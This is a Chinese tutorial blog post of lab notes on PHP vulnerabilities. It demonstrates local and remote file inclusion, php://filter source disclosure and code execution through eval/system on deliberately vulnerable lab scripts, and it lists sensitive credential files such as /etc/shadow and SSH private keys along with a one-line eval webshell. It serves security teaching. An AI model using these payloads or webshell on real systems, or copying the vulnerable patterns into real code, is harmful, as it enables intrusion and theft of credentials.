某教程学习笔记(一):17、php漏洞

原来过了十八岁以后,就再也没有夏天了,只有如约而至的七月、八月和九月,夏天是短裤蝉鸣,和一阵暴雨后少年满怀的心事,是在八月就开始憧憬九月开学的日子。。。。

一、文件包含漏洞

1、常见包含函数

include(),require(),include_once(),require_once()

2、本地文件包含,新建一个include.php文件,里面输入

<?php $test=$_GET['c']; include($test); ?>

3、再新建一个test.txt文件,里面输入:<?php phpinfo()?>

4、访问192.168.171.128/include.php?c=test.txt
在这里插入图片描述
5、读取敏感目录文件
在这里插入图片描述
windows:

C:\boot.ini //查看系统版本

C:\WINDOWS\system32\inetsrvMetaBase.xml //IIS配置文件

C:\WINDOWS\repair\sam //存储系统初次安装的密码

C:\WINDOWS\php.ini //php配置信息

C:\WINDOWS\my.ini //mysql配置信息

linux:

/root/.ssh/authorized_keys

/root/.ssh/id_rsa

/root/.ssh/id_rsa.keystore

/root/.ssh/known_hosts

/etc/passwd

/etc/shadow

/etc/my.cnf

/etc/httpd/conf/httpd.conf

/root/.bash_history

/root/.mysql_history

/proc/mounts

/proc/config.gz

二、远程文件包含

1、将上面新建的test.txt文件放到另一台服务器上192.168.1.103

2、访问 http://192.168.171.128/include.php?c=http://192.168.1.103/test.txt
在这里插入图片描述
确保php.ini中allow_url_fopen和allow_url_include要为On

三、伪协议利用读取php文件的源码

1、读取test.php文件结果如下
在这里插入图片描述
2、通过伪协议可以获取test.php的源码

http://192.168.171.128/include.php?c=php://filter/read=convert.base64-encode/resource=test.php
在这里插入图片描述
base64解码以后,获取文件源码
在这里插入图片描述
四、代码执行漏洞

1、常见代码执行函数

eval()/assert()/system()/exec()/shell_exec()/passthru()/escapesshellcmd()/pcntl_exec()

例如:<?php eval($_POST[a];?>

2、 获取ip相关信息

http://192.168.171.128/test.php?a=system(‘ipconfig’);
在这里插入图片描述
3、动态代码执行

新建test.php,内容为:

<?php $a=$_GET['a']; $b=$_GET['b']; $a($b); ?>

访问: http://192.168.171.128/test.php?a=system&b=ipconfig
在这里插入图片描述

禁止非法,后果自负
欢迎关注公众号:web安全工具库
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值